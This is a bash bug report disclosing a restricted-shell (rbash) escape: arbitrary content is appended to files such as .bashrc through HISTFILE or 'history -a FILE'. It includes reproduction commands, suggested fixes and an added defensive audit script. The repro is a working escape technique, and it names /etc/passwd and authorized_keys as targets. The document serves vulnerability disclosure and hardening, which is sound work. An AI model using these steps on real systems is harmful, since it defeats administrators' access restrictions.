From: Diffie
Newsgroups: gnu.bash.bug
To: bug-bash@gnu.org
Subject: Potential restricted bash escape by modifying history file
Date: Thu, 30 Apr 2020 14:22:31 -0400
Message-ID: <1254402a-b6ad-4bb8-9831-7830b24c12f0@www.fastmail.com>
Configuration Information [Automatically generated, do not change]:
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O2 -g -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -fexceptions -fstack-protector-strong -grecord-gcc-switches -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -m64 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -Wno-parentheses -Wno-format-security
uname output: Linux host 5.5.17-200.fc31.x86_64 #1 SMP Mon Apr 13 15:29:42 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
Machine Type: x86_64-redhat-linux-gnu

Bash Version: 5.0
Patch Level: 11
Release Status: release

Description:
It is possible to write/append arbitrary content to files from a restricted bash shell (with the privileges of the current user context)
by tweaking the HISTFILE variable, or by specifying a filename to "history -[a][w]".

This does not necessarily lead to a restriction bypass in all configurations, but does in a few that come to mind:

* If the user can write to their home directory they can append arbitrary code to .bashrc/other shell files. These shell files will execute the code without restrictions on subsequent runs of rbash (assuming rbash is not being run in posix mode, and that --norc is not being passed).
* If the user is root they can trivially get an unrestricted shell by modifying /etc/passwd, etc.
* If the cwd contains an executable script that the user can write to, they can append to the script with arbitrary code, then invoke this code from rbash: "hash -p executable_script mal_command ; mal_command" (this could be possible with an executable binary too, although it would be a little more complex).
* SSH authorized keys, various other configs.
* etc...

Again, it will depend on the configuration, but this seems exploitable in most configurations of rbash (one where it may be more difficult to exploit is when the user is placed into a non-home directory chroot where they have limited write access).

Repeat-By:

    [UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
    [__RESTRICTED] bash-5.0$ export HISTFILE=$HOME/.bashrc
    [__RESTRICTED] bash-5.0$ history -c
    [__RESTRICTED] bash-5.0$ /usr/bin/whoami
    [__RESTRICTED] bash: /usr/bin/whoami: restricted: cannot specify `/' in command names
    [__RESTRICTED] bash-5.0$ history -a
    [__RESTRICTED] bash-5.0$ exit
    [UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
    diffie                   # whoami inserted into .bashrc above
    [__RESTRICTED] bash-5.0$

OR without using the HISTFILE variable:

    [UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
    [__RESTRICTED] bash-5.0$ history -a $HOME/.bashrc '
    > /usr/bin/whoami
    > '
    [__RESTRICTED] bash-5.0$ exit
    [UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r
    diffie
    [__RESTRICTED] bash-5.0$

Fix:

* Disable writing to a specific file in rbash with "history -[a][w] /tmp/bad_file bad_command" and make HISTFILE readonly. May be some other edge cases here.
* Disable history in rbash altogether.
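The report above ties the append primitive to a handful of writable targets in the user's environment (a writable home directory, the startup files rbash sources before restrictions apply, authorized_keys, and writable executable scripts). The following audit helper is an added example and is not part of the bug report or of bash; it checks a restricted user's home for exactly those targets so an administrator can confirm whether a deployment is affected. It assumes it is run as the restricted user (for example via `su -s /bin/sh USER`), since `test -w` answers for the calling user and root passes every `-w` test; the `TAG path` output format and the function names are this example's own.

```shell
#!/bin/sh
# Added audit helper (not part of the bug report above): list the writable
# targets in a restricted-shell user's home that the report identifies as
# escape routes for an arbitrary-append primitive such as "history -a FILE":
# a writable home directory, writable startup files that rbash sources
# without restrictions, a writable authorized_keys, and writable executable
# scripts that "hash -p script cmd; cmd" could run.
#
# Assumption: run this as the restricted user (for example via
# "su -s /bin/sh USER"), because test -w answers for the caller, and root
# passes every -w test. The findings format (TAG path) is this script's own.

# Print one "TAG path" line per finding; return 0 if clean, 1 otherwise.
rbash_audit_home() {
    home=$1
    found=0

    # A writable home lets the user create .bashrc if it does not exist yet.
    if [ -d "$home" ] && [ -w "$home" ]; then
        echo "WRITABLE_DIR $home"
        found=1
    fi

    # Files bash reads at startup (before restricted mode is enforced) or
    # that sshd trusts; any of these, if appendable, turns the append
    # primitive into unrestricted command execution.
    for f in .bashrc .bash_profile .bash_login .profile \
             .ssh/authorized_keys; do
        if [ -e "$home/$f" ] && [ -w "$home/$f" ]; then
            echo "WRITABLE_FILE $home/$f"
            found=1
        fi
    done

    # Executable regular files that are also writable: appended code runs
    # when the script is invoked (the report's "hash -p" trick sidesteps the
    # slash-in-command-name restriction).
    for f in "$home"/* "$home"/.[!.]*; do
        [ -f "$f" ] && [ -x "$f" ] && [ -w "$f" ] || continue
        echo "WRITABLE_EXEC $f"
        found=1
    done

    return $found
}

# Number of findings for a home directory (0 means nothing writable found).
rbash_audit_count() {
    rbash_audit_home "$1" | wc -l | tr -d ' '
}
```

A non-empty result means the append primitive is enough for an escape on that account; the immediate mitigation is to make the listed paths root-owned and not writable by the user (or move the user into a directory they cannot write to), which is the configuration the report itself describes as harder to exploit. Files outside the home, such as writable scripts in whatever cwd the user can reach, need the same check.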